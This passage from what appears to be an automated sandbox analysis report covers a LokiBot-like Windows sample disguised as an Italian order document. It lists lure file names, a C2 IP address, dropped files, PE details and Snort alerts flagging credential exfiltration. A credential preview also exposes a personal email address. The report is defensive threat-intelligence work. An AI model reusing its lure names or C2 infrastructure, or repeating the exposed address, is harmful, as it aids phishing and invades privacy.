                                              DkTfOvsiCRGet hashmaliciousBrowse
                                              • 169.82.147.51
                                              RpcSecurity.armGet hashmaliciousBrowse
                                              • 169.184.22.186
                                              KKveTTgaAAsecNNaaaa.x86-20211122-0650Get hashmaliciousBrowse
                                              • 169.107.15.33
                                              eh.x86Get hashmaliciousBrowse
                                              • 165.255.192.210
                                              g2ZhDilVO3Get hashmaliciousBrowse
                                              • 169.225.110.154
                                              TikNgaeW5GGet hashmaliciousBrowse
                                              • 169.66.107.25
                                              Hilix.armGet hashmaliciousBrowse
                                              • 169.76.1.149
                                              ROHOSTWAY-ASROATTACHMENT 6637268#Hydro tech BG_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              ARRIVAL NOTICE DHL Code Nr 4622256860_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Richiesta di quotazione ISCOTRANS SPA Nr.5653.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Nr_ SOFIA_587646211152021.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SOFIA_BG PROJECT Nr_534427355.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Arimar International Spa Ordine Urgente Nr. 67754#11_3_2021_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SecuriteInfo.com.Trojan.GenericKD.47258968.7621.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              PO_W4420211025#BULGARIA SAINT GOBAIN.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Progetto Plastisavio S.p.A. 19_10_2021_pdf.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              Schenker Italiana S.p.A. CW305.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              SecuriteInfo.com.__vbaHresultCheckObj.9268.exeGet hashmaliciousBrowse
                                              • 176.223.209.128
                                              118937279-112134-sanlccjavap0003-60.exeGet hashmaliciousBrowse
                                              • 176.223.208.10
                                              171021434-045230-sanlccjavap0003-10004.exeGet hashmaliciousBrowse
                                              • 176.223.208.10
                                              6fbb325e_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 176.223.208.10
                                              PE001163862782-11737929013-93891812PDF.exeGet hashmaliciousBrowse
                                              • 176.223.208.10
                                              Em anexo esta a Fatura Proforma.exeGet hashmaliciousBrowse
                                              • 176.223.209.5
                                              69P.O 2315_PDF.exeGet hashmaliciousBrowse
                                              • 84.40.5.143
                                              40INVOICE BTS_Pdf.exeGet hashmaliciousBrowse
                                              • 84.40.5.143
                                              17Bill of lading Status_pdf.exeGet hashmaliciousBrowse
                                              • 84.40.5.143

                                              JA3 Fingerprints

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              37f463bf4616ecd445d4a1937da06e19mal1.htmlGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              5A15ECE1649A5EF54B70B95D9D413BAD068B8C1C932E2.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              DOC5629.htmGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              Racun je u prilogu.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              exe.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              INF-BRdocsx.NDVDELDKRS.msiGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              2GEg45PlG9.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              cJ2wN3RKmh.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              J73PTzDghy.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              fkYZ7hyvnD.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              xzmHphquAP.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              R0xLHA2mT5.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              Rats4dIOmA.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              XP-SN-7843884.htmGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              XP-SN-8324655.htmGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              new-1834138397.xlsGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              1.htmGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              FACTURAS.exeGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              new-1179494065.xlsGet hashmaliciousBrowse
                                              • 197.242.150.64
                                              Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                              • 197.242.150.64

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Credentials\93CE54EBD72B5E2187F75E8118A14612_dec
                                              Process:C:\Windows\System32\lsass.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):3656
                                              Entropy (8bit):7.0471426164335735
                                              Encrypted:false
                                              SSDEEP:48:UOt6arrbUSpRRAr24LrPMJvPdkbr0Cn4mroYbkM6CRrlWycl9rfkTJNrrN8euJMQ:UO8abFpRRG24fgPd6dD2GMsl53zqLA8
                                              MD5:DF46EAA3E0822E1F26163A47DD2EBC88
                                              SHA1:74C5CD5E0A656E2B17567486D8893A41D6FC1837
                                              SHA-256:2DB1C00E04388BD8BDD7263D10200FB52F7F34078733B4B722BF142B0D9E7E19
                                              SHA-512:B316793DCD4B612D09E34DF00E27DCAFA0E6452913B1DC7A43D5483C259DADA9FA11E32F6FA42D32A460EE221D25A82B2888C02B0060E7BBF6810A0229A118E1
                                              Malicious:false
                                              Reputation:low
                                              Preview: 0...H.................0.............................L.e.g.a.c.y.G.e.n.e.r.i.c.:.t.a.r.g.e.t.=.M.i.c.r.o.s.o.f.t.A.c.c.o.u.n.t.:.u.s.e.r.=.s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m.......(...P.e.r.s.i.s.t.e.d.C.r.e.d.e.n.t.i.a.l.......6...s.h.a.h.a.k...s.h.a.p.i.r.a.@.o.u.t.l.o.o.k...c.o.m...........D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.0...................z..O........$...I.AP...i&...........f...... ....}3..+....i.a...-..*..JEj...d<~............ ........K%..D.c<.P............j. ...zp.@..e.s.Wes1J..B..G.U[....0O%9l...U..F..vO..<.......<..sn.8j3*...4?.Be.i.BqM.q^..|x.....D..s).^o....[,.....D...M.i.c.r.o.s.o.f.t._.W.i.n.d.o.w.s.L.i.v.e.:.a.u.t.h.s.t.a.t.e.:.1.......1.YY..VRnE...%...m....Fa...?...2KC...Z.w...`+.&..\^.....[...*6M0.V.9....N..S..|.....,....;...i.v]y....;...E.R..I]....C.....z..%.....?...].5..p..<.... .....>....bC.|...|..B..Q0_f).^.k.Nt#e..[...iv+G.x.T.z.~...S.....t..`.....m....\.iq........D...M.i.c.r.o.s.o.
                                              C:\Users\user\AppData\Local\Temp\~DFBA8B24485FEA2BF0.TMP
                                              Process:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):16384
                                              Entropy (8bit):1.5460794479699351
                                              Encrypted:false
                                              SSDEEP:96:kOtJyg4D7OKBqQOtJyg4D1DDPwYDPXxJXf6nZV4XoB:1KD7OKAJKD1DDPwYDPXxJXf6nZV4XoB
                                              MD5:A10173F2BC7809BD9C218B204F91B9B5
                                              SHA1:CCC33C4FF5908D771A921E81FA6DEC9E83BF9399
                                              SHA-256:9D569DF219A76092E36A090729EF451275255D21A7B7FA9BEEA8431DF88906D8
                                              SHA-512:F2FB87D14882D23D9F49F4AE31D179CE083C0D7F2C87755C68600CDBB8A48E06E02DBFD0FCF42BB7611590FDF03EB4FDA0B5FBB530A1DB4AAB5487099A495FDB
                                              Malicious:false
                                              Reputation:low
                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.hdb
                                              Process:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              File Type:ISO-8859 text, with no line terminators
                                              Category:dropped
                                              Size (bytes):4
                                              Entropy (8bit):2.0
                                              Encrypted:false
                                              SSDEEP:3:7:7
                                              MD5:4F1717C9B5ACF6604D800FE07A8D320F
                                              SHA1:151524FA23C0F30AB06C0DA0BEAFDB77ABAA3739
                                              SHA-256:B2B5DAEAC1A532BA9D1086A6CFB21F7CD9381D4FFAFB12274E5248D108F0BDC6
                                              SHA-512:DA07F4DEB58DFBD694F4A7D2D54D154B78E507EC6477F1DB0CA6922F25E5E3FA0C0FB6FC78D1FA584FC883754D3FCA9F567207E61CE8C3851C79D5AB42C2A258
                                              Malicious:false
                                              Reputation:low
                                              Preview: .@h.
                                              C:\Users\user\AppData\Roaming\5D4ACB\B73EF6.lck
                                              Process:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: 1
                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6eb
                                              Process:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):47
                                              Entropy (8bit):1.1262763721961973
                                              Encrypted:false
                                              SSDEEP:3:/lSllIEXln:AWE1
                                              MD5:D69FB7CE74DAC48982B69816C3772E4E
                                              SHA1:B1C04CDB2567DC2B50D903B0E1D0D3211191E065
                                              SHA-256:8CC6CA5CA4D0FA03842A60D90A6141F0B8D64969E830FC899DBA60ACB4905396
                                              SHA-512:7E4EC58DA8335E43A4542E0F6E05FA2D15393E83634BE973AA3E758A870577BA0BA136F6E831907C4B30D587B8E6EEAFA2A4B8142F49714101BA50ECC294DDB0
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ........................................user.

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):6.174630404591659
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:ORDINE + DDT A.M.F SpA.exe
                                              File size:164928
                                              MD5:f5423b7a89876044078cbb68db883af8
                                              SHA1:24c550c47d26090f298fea030d7fb890c94737a5
                                              SHA256:68a315123349444d30fed12643a7be20eb003531a4b95d0db800fb765449037d
                                              SHA512:a1e0da217c0a383878405f53b7318316d87fa7483831429ef50973a526bf160baa855ac2b7853dfe95b15265aee3bba9044ad04ee4319ab41cb2fdb1cd2cf166
                                              SSDEEP:3072:9cqN5FpupBqUudn4Qw6cOOxQnLC6hpA7VHACd:xN5mpBHAYxQnLn4D
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L......O................. ...`......@........0....@

                                              File Icon

                                              Icon Hash:e5c1e079b0dcdc3c

                                              Static PE Info

                                              General

                                              Entrypoint:0x401640
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x4FF98A07 [Sun Jul 8 13:24:23 2012 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:90425c3cfb1918f16a4ffb8047a25e88

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:E=Halvmilitr5@Pasan.Out, CN=yeara, OU=Hnisses, O=Frstestyrmndenes, L=langhalms, S=Targon, C=TH
                                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                              Error Number:-2146762487
                                              Not Before, Not After
                                              • 25/11/2021 06:31:27 25/11/2022 06:31:27
                                              Subject Chain
                                              • E=Halvmilitr5@Pasan.Out, CN=yeara, OU=Hnisses, O=Frstestyrmndenes, L=langhalms, S=Targon, C=TH
                                              Version:3
                                              Thumbprint MD5:1675B0681F6E08F88C72FD3302E50FD9
                                              Thumbprint SHA-1:DDEB96699987B30C7A4E263EC2B1CE4BED20032D
                                              Thumbprint SHA-256:490EABAB012CB43983C62C20A02D579B84FABA9ADF4734E32E4330690D5139D1
                                              Serial:00

                                              Entrypoint Preview

                                              Instruction
                                              push 004016F4h
                                              call 00007F3B60A66FF3h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              xor byte ptr [eax], al
                                              add byte ptr [eax], al
                                              inc eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [edi-6A393297h], cl
                                              pop ss
                                              mov dword ptr [ecx-75h], ecx
                                              or ecx, dword ptr [esi-40h]
                                              dec esi
                                              out dx, al
                                              iretd
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add dword ptr [eax], eax
                                              add byte ptr [eax], al
                                              inc edx
                                              add byte ptr [esi], al
                                              push eax
                                              add dword ptr [ecx], 46h
                                              popad
                                              je 00007F3B60A67076h
                                              insb
                                              imul esp, dword ptr [edi+65h], 1C000073h
                                              insb
                                              hlt
                                              add al, byte ptr [eax]
                                              add byte ptr [eax], al
                                              add byte ptr [esi], al
                                              add byte ptr [eax], al
                                              add al, ah
                                              aaa
                                              inc eax
                                              add byte ptr [edi], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+ebp+40h], ch
                                              add byte ptr [edi], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax+ebp], dl
                                              inc eax
                                              add byte ptr [edi], al
                                              add byte ptr [eax], al
                                              add al, al
                                              daa
                                              inc eax
                                              add byte ptr [ecx], al
                                              add byte ptr [eax+eax], al
                                              inc eax
                                              and eax, dword ptr [eax+00h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x226f40x28.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x260000x22a4.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x270000x1440
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x118.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x21bcc0x22000False0.385268267463data6.40485948077IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .data0x230000x20b40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .rsrc0x260000x22a40x3000False0.194580078125data3.74537367217IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              CUSTOM0x27e840x420ASCII text, with CRLF line terminatorsEnglishUnited States
                                              CUSTOM0x27a480x43cASCII text, with CRLF line terminatorsEnglishUnited States
                                              CUSTOM0x276c60x382ASCII text, with CRLF line terminatorsEnglishUnited States
                                              RT_ICON0x2759e0x128GLS_BINARY_LSB_FIRST
                                              RT_ICON0x270360x568GLS_BINARY_LSB_FIRST
                                              RT_ICON0x26d4e0x2e8data
                                              RT_ICON0x264a60x8a8data
                                              RT_GROUP_ICON0x264680x3edata
                                              RT_VERSION0x262300x238dataChineseTaiwan

                                              Imports

                                              DLLImport
                                              MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                              Version Infos

                                              DescriptionData
                                              Translation0x0404 0x04b0
                                              InternalNameHYDROCHELIDON
                                              FileVersion1.00
                                              ProductNameDaisy chain
                                              ProductVersion1.00
                                              FileDescriptionDaisy chain
                                              OriginalFilenameHYDROCHELIDON.exe

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States
                                              ChineseTaiwan

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              11/25/21-10:47:51.302644UDP254DNS SPOOF query response with TTL of 1 min. and no authority53622421.1.1.1192.168.11.20
                                              11/25/21-10:47:51.432888UDP254DNS SPOOF query response with TTL of 1 min. and no authority53622429.9.9.9192.168.11.20
                                              11/25/21-10:47:51.433091ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                              11/25/21-10:47:54.204528TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14981780192.168.11.20176.223.209.128
                                              11/25/21-10:47:54.204528TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981780192.168.11.20176.223.209.128
                                              11/25/21-10:47:54.204528TCP2025381ET TROJAN LokiBot Checkin4981780192.168.11.20176.223.209.128
                                              11/25/21-10:47:54.204528TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24981780192.168.11.20176.223.209.128
                                              11/25/21-10:48:00.994992TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982180192.168.11.20176.223.209.128
                                              11/25/21-10:48:00.994992TCP2025381ET TROJAN LokiBot Checkin4982180192.168.11.20176.223.209.128
                                              11/25/21-10:48:01.719256TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982280192.168.11.20176.223.209.128
                                              11/25/21-10:48:01.719256TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982280192.168.11.20176.223.209.128
                                              11/25/21-10:48:01.719256TCP2025381ET TROJAN LokiBot Checkin4982280192.168.11.20176.223.209.128
                                              11/25/21-10:48:01.719256TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982280192.168.11.20176.223.209.128
                                              11/25/21-10:48:02.549129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982380192.168.11.20176.223.209.128
                                              11/25/21-10:48:02.549129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982380192.168.11.20176.223.209.128
                                              11/25/21-10:48:02.549129TCP2025381ET TROJAN LokiBot Checkin4982380192.168.11.20176.223.209.128
                                              11/25/21-10:48:02.549129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982380192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.269523TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982480192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.269523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982480192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.269523TCP2025381ET TROJAN LokiBot Checkin4982480192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.269523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982480192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.921018TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982580192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.921018TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982580192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.921018TCP2025381ET TROJAN LokiBot Checkin4982580192.168.11.20176.223.209.128
                                              11/25/21-10:48:03.921018TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982580192.168.11.20176.223.209.128
                                              11/25/21-10:48:04.640364TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982680192.168.11.20176.223.209.128
                                              11/25/21-10:48:04.640364TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982680192.168.11.20176.223.209.128
                                              11/25/21-10:48:04.640364TCP2025381ET TROJAN LokiBot Checkin4982680192.168.11.20176.223.209.128
                                              11/25/21-10:48:04.640364TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982680192.168.11.20176.223.209.128
                                              11/25/21-10:48:05.424332TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14982880192.168.11.20176.223.209.128
                                              11/25/21-10:48:05.424332TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982880192.168.11.20176.223.209.128
                                              11/25/21-10:48:05.424332TCP2025381ET TROJAN LokiBot Checkin4982880192.168.11.20176.223.209.128
                                              11/25/21-10:48:05.424332TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24982880192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.230046TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984480192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.230046TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984480192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.230046TCP2025381ET TROJAN LokiBot Checkin4984480192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.230046TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984480192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.992097TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984580192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.992097TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984580192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.992097TCP2025381ET TROJAN LokiBot Checkin4984580192.168.11.20176.223.209.128
                                              11/25/21-10:48:06.992097TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984580192.168.11.20176.223.209.128
                                              11/25/21-10:48:07.734356TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984680192.168.11.20176.223.209.128
                                              11/25/21-10:48:07.734356TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984680192.168.11.20176.223.209.128
                                              11/25/21-10:48:07.734356TCP2025381ET TROJAN LokiBot Checkin4984680192.168.11.20176.223.209.128
                                              11/25/21-10:48:07.734356TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984680192.168.11.20176.223.209.128
                                              11/25/21-10:48:08.418319TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984780192.168.11.20176.223.209.128
                                              11/25/21-10:48:08.418319TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984780192.168.11.20176.223.209.128
                                              11/25/21-10:48:08.418319TCP2025381ET TROJAN LokiBot Checkin4984780192.168.11.20176.223.209.128
                                              11/25/21-10:48:08.418319TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984780192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.107461TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984880192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.107461TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984880192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.107461TCP2025381ET TROJAN LokiBot Checkin4984880192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.107461TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984880192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.857430TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984980192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.857430TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4984980192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.857430TCP2025381ET TROJAN LokiBot Checkin4984980192.168.11.20176.223.209.128
                                              11/25/21-10:48:09.857430TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984980192.168.11.20176.223.209.128
                                              11/25/21-10:48:10.692074TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985080192.168.11.20176.223.209.128
                                              11/25/21-10:48:10.692074TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.11.20176.223.209.128
                                              11/25/21-10:48:10.692074TCP2025381ET TROJAN LokiBot Checkin4985080192.168.11.20176.223.209.128
                                              11/25/21-10:48:10.692074TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985080192.168.11.20176.223.209.128
                                              11/25/21-10:48:11.469665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.11.20176.223.209.128
                                              11/25/21-10:48:11.469665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985180192.168.11.20176.223.209.128
                                              11/25/21-10:48:11.469665TCP2025381ET TROJAN LokiBot Checkin4985180192.168.11.20176.223.209.128
                                              11/25/21-10:48:11.469665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.137740TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985280192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.137740TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985280192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.137740TCP2025381ET TROJAN LokiBot Checkin4985280192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.137740TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985280192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.876249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985380192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.876249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985380192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.876249TCP2025381ET TROJAN LokiBot Checkin4985380192.168.11.20176.223.209.128
                                              11/25/21-10:48:12.876249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985380192.168.11.20176.223.209.128
                                              11/25/21-10:48:13.646369TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985480192.168.11.20176.223.209.128
                                              11/25/21-10:48:13.646369TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985480192.168.11.20176.223.209.128
                                              11/25/21-10:48:13.646369TCP2025381ET TROJAN LokiBot Checkin4985480192.168.11.20176.223.209.128
                                              11/25/21-10:48:13.646369TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985480192.168.11.20176.223.209.128
                                              11/25/21-10:48:14.406984TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985580192.168.11.20176.223.209.128
                                              11/25/21-10:48:14.406984TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985580192.168.11.20176.223.209.128
                                              11/25/21-10:48:14.406984TCP2025381ET TROJAN LokiBot Checkin4985580192.168.11.20176.223.209.128
                                              11/25/21-10:48:14.406984TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985580192.168.11.20176.223.209.128
